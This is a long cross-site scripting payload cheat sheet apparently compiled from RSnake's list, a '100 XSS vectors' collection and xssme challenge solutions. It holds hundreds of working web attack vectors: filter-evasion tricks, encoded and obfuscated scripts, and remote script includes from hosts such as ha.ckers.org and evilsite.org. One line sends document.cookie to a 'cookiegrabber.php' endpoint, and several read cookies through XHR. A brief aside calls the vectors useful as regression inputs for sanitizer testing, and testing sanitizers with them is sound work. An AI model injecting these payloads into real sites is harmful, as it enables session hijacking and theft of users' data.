<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> works on webkit by @garethheyes | |
▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉ | |
MORE VECTORS: | |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
"><script>alert(0)</script> | |
<script src=http://yoursite.com/your_files.js></script> | |
</title><script>alert(/xss/)</script> | |
</textarea><script>alert(/xss/)</script> | |
<IMG LOWSRC="javascript:alert('XSS')"> | |
<IMG DYNSRC="javascript:alert('XSS')"> | |
<font style='color:expression(alert(document.cookie))'> | |
<img src="javascript:alert('XSS')"> | |
<script language="JavaScript">alert('XSS')</script> | |
[url=javascript:alert('XSS');]click me[/url] | |
<body onunload="javascript:alert('XSS');"> | |
<script>alert(1);</script> | |
<script>alert('XSS');</script> | |
<script src="http://www.evilsite.org/cookiegrabber.php"></script> | |
<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="??(document.cookie)</script> | |
<scr<script>ipt>alert('XSS');</scr</script>ipt> | |
<script>alert(String.fromCharCode(88,83,83))</script> | |
<img src=foo.png onerror=alert(/xssed/) /> | |
<style>@import'javascript:alert("XSS")';</style> | |
<? echo('<scr)'; echo('ipt>alert("XSS")</script>'); ?> | |
<marquee><script>alert('XSS')</script></marquee> | |
<IMG SRC="jav	ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS'); | |
<body onLoad="alert('XSS');" | |
[color=red' onmouseover="alert('xss')"]mouse over[/color] | |
"/></a></><img src=1.gif onerror=alert(1)> | |
window.alert("Bonjour !"); | |
<div style="x:expression((window.r==1)?'':eval('r=1; | |
alert(String.fromCharCode(88,83,83));'))"> | |
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe> | |
"><script alert(String.fromCharCode(88,83,83))</script> | |
'>><marquee><h1>XSS</h1></marquee> | |
'">><script>alert('XSS')</script> | |
'">><marquee><h1>XSS</h1></marquee> | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> | |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> | |
<script>var var = 1; alert(var)</script> | |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
<?='<SCRIPT>alert("XSS")</SCRIPT>'?> | |
<IMG SRC='vbscript:msgbox("XSS")'> | |
" onfocus=alert(document.domain) "> <" | |
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> | |
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS | |
perl -e 'print "<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out | |
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";' > out | |
<br size="&{alert('XSS')}"> | |
<scrscriptipt>alert(1)</scrscriptipt> | |
</br style=a:expression(alert())> | |
</script><script>alert(1)</script> | |
<SCRIPT>document.write("XSS");</SCRIPT> | |
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a?); | |
='><script>alert("xss")</script> | |
<isindex action="javas	cript:alert(1)" type=image> | |
<script?=">"?="http://yoursite.com/xss.js?69,69"></script> | |
<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body> | |
">/XaDoS/><script>alert(document.cookie)</script> | |
<script> src="http://www.site.com/XSS.js"></script> | |
">/KinG-InFeT.NeT/><script>alert(document.cookie)</script> | |
src="http://www.site.com/XSS.js"></script> | |
"><BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert("XSS")> | |
[color=red width=expression(alert(123))][color] | |
<BASE HREF="javascript:alert('XSS');//"> | |
Execute(MsgBox(chr(88)&chr(83)&chr(83)))< | |
"></iframe><script>alert(123)</script> | |
<body onLoad="while(true) alert('XSS');"> | |
'"></title><script>alert(1111)</script> | |
</textarea>'"><script>alert(document.cookie)</script> | |
'""><script language="JavaScript"> alert('X nS nS');</script> | |
</script></script><<<<script><>>>><<<script>alert(123)</script> | |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |
'></select><script>alert(123)</script> | |
'>"><script src = 'http://www.site.com/XSS.js'></script> | |
}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script> | |
<html><noalert><noscript>(123)</noscript><script>(123)</script> | |
<IMG SRC=JaVaScRiPt:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> | |
<IMG SRC="jav ascript:alert('XSS');"> | |
<IMG SRC="jav	ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
<BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert("XSS")> | |
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<<SCRIPT>alert("XSS");//<</SCRIPT> | |
<SCRIPT SRC=//ha.ckers.org/.j> | |
<IMG SRC="javascript:alert('XSS')" | |
<iframe src=http://ha.ckers.org/scriptlet.html < | |
";alert('XSS');// | |
</TITLE><SCRIPT>alert("XSS");</SCRIPT> | |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |
<BODY BACKGROUND="javascript:alert('XSS')"> | |
<IMG DYNSRC="javascript:alert('XSS')"> | |
<IMG LOWSRC="javascript:alert('XSS')"> | |
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> | |
<IMG SRC='vbscript:msgbox("XSS")'> | |
<IMG SRC="livescript:[code]"> | |
<BODY ONLOAD=alert('XSS')> | |
<BGSOUND SRC="javascript:alert('XSS');"> | |
<BR SIZE="&{alert('XSS')}"> | |
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> | |
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> | |
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> | |
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> | |
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> | |
<STYLE>@import'javascript:alert("XSS")';</STYLE> | |
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> | |
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> | |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
<XSS STYLE="xss:expression(alert('XSS'))"> | |
<XSS STYLE="behavior: url(xss.htc);"> | |
<a <!-- --> href="javascript:alert(-1)">hello</a> | |
<a href="javascript:alert(-1)" | |
<a href="javascript:alert%252831337%2529">Hello</a> | |
<a <!-- href="javascript:alert(31337);">Hello</a> | |
<img src="http://www.w3schools.com/tags/planets.gif" width="145" height="126" alt="Planets" usemap="#planetmap"><map name="planetmap"><area shape="rect" coords="0,0,145,126" a-=">" href="javascript:alert(-1)"></map> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
" onhover="javascript:alert(-1)" | |
"><script>alert('test')</script> | |
▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉ | |
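ha.ckers.org / sla.ckers.org (entries from RSnake's cheat sheet; many depend on legacy browser behaviour such as IE CSS expression(), vbscript: and -moz-binding, and are chiefly useful today as regression inputs when testing output encoding and HTML sanitizers) | |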
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//></SCRIPT>--!><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=JaVaScRiPt:alert('XSS')> | |
<IMG SRC=javascript:alert("XSS")> | |
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> | |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC="jav ascript:alert('XSS');"> | |
<IMG SRC="jav	ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
<IMG | |
SRC | |
= | |
" | |
j | |
a | |
v | |
a | |
s | |
c | |
r | |
i | |
p | |
t | |
: | |
a | |
l | |
e | |
r | |
t | |
( | |
' | |
X | |
S | |
S | |
' | |
) | |
" | |
> | |
<IMG SRC="  javascript:alert('XSS');"> | |
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<BODY onload!#$%&()*~+_.,:;?@[/|\]^`=alert("XSS")> | |
<<SCRIPT>alert("XSS");//<</SCRIPT> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B> | |
<SCRIPT SRC=//ha.ckers.org/.j> | |
<IMG SRC="javascript:alert('XSS')" | |
<iframe src=http://ha.ckers.org/scriptlet.html < | |
<SCRIPT>a=/XSS/ | |
alert(a.source)</SCRIPT> | |
";alert('XSS');// | |
</TITLE><SCRIPT>alert("XSS");</SCRIPT> | |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |
<BODY BACKGROUND="javascript:alert('XSS')"> | |
<BODY ONLOAD=alert('XSS')> | |
<IMG DYNSRC="javascript:alert('XSS')"> | |
<IMG LOWSRC="javascript:alert('XSS')"> | |
<BGSOUND SRC="javascript:alert('XSS');"> | |
<BR SIZE="&{alert('XSS')}"> | |
<LAYER SRC="http://ha.ckers.org/ | |
scriptlet.html"></LAYER> | |
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> | |
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> | |
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> | |
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> | |
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> | |
<XSS STYLE="behavior: url(xss.htc);"> | |
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS | |
<IMG SRC='vbscript:msgbox("XSS")'> | |
<IMG SRC="mocha:[code]"> | |
<IMG SRC="livescript:[code]"> | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> | |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> | |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> | |
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> | |
<TABLE BACKGROUND="javascript:alert('XSS')"> | |
<TABLE><TD BACKGROUND="javascript:alert('XSS')"> | |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> | |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
<DIV STYLE="width: expression(alert('XSS'));"> | |
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> | |
<IMG STYLE="xss:expr/*XSS*ession(alert('XSS'))"> | |
<XSS STYLE="xss:expression(alert('XSS'))"> | |
exp/*<A STYLE='no\xss:noxss("**"); | |
xss:ex/*XSS*//**pression(alert("XSS"))'> | |
<STYLE TYPE="text/javascript">alert('XSS');</STYLE> | |
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> | |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
<!--[if gte IE 4]> | |
<SCRIPT>alert('XSS');</SCRIPT> | |
<![endif]--> | |
<BASE HREF="javascript:alert('XSS');//"> | |
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> | |
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> | |
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> | |
<HTML xmlns:xss> | |
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> | |
<xss:xss>XSS</xss:xss> | |
</HTML> | |
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> | |
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> | |
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> | |
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> | |
<XML SRC="xsstest.xml" ID=I></XML> | |
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> | |
<HTML><BODY> | |
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> | |
<?import namespace="t" implementation="#default#time2"> | |
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"> | |
</BODY></HTML> | |
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> | |
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> | |
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD><SCRIPT>alert('XSS');</SCRIPT> | |
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<A HREF="http://66.102.7.147/">XSS</A> | |
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> | |
<A HREF="http://1113982867/">XSS</A> | |
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> | |
<A HREF="http://0102.0146.0007.00000223/">XSS</A> | |
<A HREF="h | |
tt p://6	6.000146.0x7.147/">XSS</A> | |
<A HREF="//www.google.com/">XSS</A> | |
<A HREF="//google">XSS</A> | |
<A HREF="http://ha.ckers.org@google">XSS</A> | |
<A HREF="http://google:ha.ckers.org">XSS</A> | |
<A HREF="http://google.com/">XSS</A> | |
<A HREF="http://www.google.com./">XSS</A> | |
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A> | |
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> | |
▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉ | |
100 #XSS Vectors by @soaj1664ashar | |
<iframe %00 src="	javascript:prompt(1)	"%00> | |
<svg><style>{font-family:'<iframe/onload=confirm(1)>' | |
<input/onmouseover="javaSCRIPT:confirm(1)" | |
<sVg><scRipt %00>alert(1) {Opera} | |
<img/src=`%00` onerror=this.onerror=confirm | |
<form><isindex formaction="javascript:confirm(1)" | |
<img src=`%00`
 onerror=alert(1)
 | |
<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> | |
<ScRipT 5-0*3?=>prompt(1)</ScRipT giveanswerhere=? | |
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> | |
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ | |
"><h1/onmouseover='\u0061lert(1)'>%00 | |
<iframe/src="data:text/html,<svg onload=alert(1)>"> | |
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> | |
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script | |
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} | |
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> | |
<iframe src=javascript:alert(document.location)> | |
<form><a href="javascript:\u0061lert(1)">X | |
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'> | |
<img/	  src=`~` onerror=prompt(1)> | |
<form><iframe 	  src="javascript:alert(1)" 	;> | |
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a | |
http://www.google<script .com>alert(document.location)</script | |
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a | |
<img/src=@  onerror = prompt('1') | |
<style/onload=prompt('XSS') | |
<script ^__^>alert(String.fromCharCode(49))</script ^__^ | |
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-( | |
�</form><input type="date" onfocus="alert(1)"> | |
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> | |
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ | |
<iframe srcdoc='<body onload=prompt(1)>'> | |
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a> | |
<script ~~~>alert(0%0)</script ~~~> | |
<style/onload=<!--	> alert (1)> | |
<///style///><span %2F onmousemove='alert(1)'>SPAN | |
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1) | |
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>' | |
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} | |
<marquee onstart='javascript:alert(1)'>^__^ | |
<div/style="width:expression(confirm(1))">X</div> {IE7} | |
<iframe/%00/ src=javaSCRIPT:alert(1) | |
//<form/action=javascript:alert(document.cookie)><input/type='submit'>// | |
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt/*iframe/src*/> | |
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ | |
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> | |
<a/href="javascript: javascript:prompt(1)"><input type="X"> | |
</plaintext\></|\><plaintext/onmouseover=prompt(1) | |
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} | |
<a href="javascript:\u0061le%72t(1)"><button> | |
<div onmouseover='alert(1)'>DIV</div> | |
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> | |
<a href="jAvAsCrIpT:alert(1)">X</a> | |
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |
<var onmouseover="prompt(1)">On Mouse Over</var> | |
<a href=javascript:alert(document.cookie)>Click Here</a> | |
<img src="/" =_=" title="onerror='prompt(1)'"> | |
<%<!--'%><script>alert(1);</script --> | |
<script src="data:text/javascript,alert(1)"></script> | |
<iframe/src \/\/onload = prompt(1) | |
<iframe/onreadystatechange=alert(1) | |
<svg/onload=alert(1) | |
<input value=<><iframe/src=javascript:confirm(1) | |
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> | |
http://www.<script>alert(1)</script .com | |
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe> | |
<svg><script ?>alert(1) | |
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> | |
<img src=`xx:xx`onerror=alert(1)> | |
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> | |
<meta http-equiv="refresh" content="0;javascript:alert(1)"/> | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> | |
<svg contentScriptType=text/vbs><script>MsgBox | |
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a | |
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u006worksinIE> | |
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U | |
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F | |
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script | |
<object data=javascript:\u0061le%72t(1)> | |
<script>++1-+?(1)</script> | |
<body/onload=<!-->
alert(1)> | |
<script itworksinallbrowsers>/*<script* */alert(1)</script | |
<img src ?itworksonchrome?\/onerror = alert(1) | |
<svg><script>//
confirm(1);</script </svg> | |
<svg><script onlypossibleinopera:-)> alert(1) | |
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe | |
<script x> alert</script 1=2 | |
<div/onmouseover='alert(1)'> style="x:"> | |
<--`<img/src=` onerror=alert(1)> --!> | |
<script/src=data:text/javascript,alert(1)></script> | |
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> | |
"><img src=x onerror=window.open('https://www.google.com/');> | |
<form><button formaction=javascript:alert(1)>CLICKME | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik></object> | |
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> | |
1<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> | |
▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉ | |
AND EVEN MORE: | |
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E | |
<<scr\0ipt/src=http://xss.com/xss.js></script | |
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E | |
' onmouseover=alert(/Black.Spook/) | |
"><iframe%20src="http://google.com"%%203E | |
'<script>window.onload=function(){document.forms[0].message.value='1';}</script> | |
x”</title><img src%3dx onerror%3dalert(1)> | |
<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script> | |
<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script> | |
<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script> | |
<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script> | |
<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> | |
<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script> | |
<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script> | |
<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script> | |
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74> | |
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script> | |
<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script> | |
<script>alert(document.head.innerHTML.substr(146,20));</script> | |
<script>alert(document.head.childNodes[3].text)</script> | |
<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script> | |
<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script> | |
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script> | |
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script> | |
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script> | |
<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script> | |
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script> | |
<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script> | |
<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe> | |
<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> | |
<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> # | |
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # | |
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT># | |
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script># | |
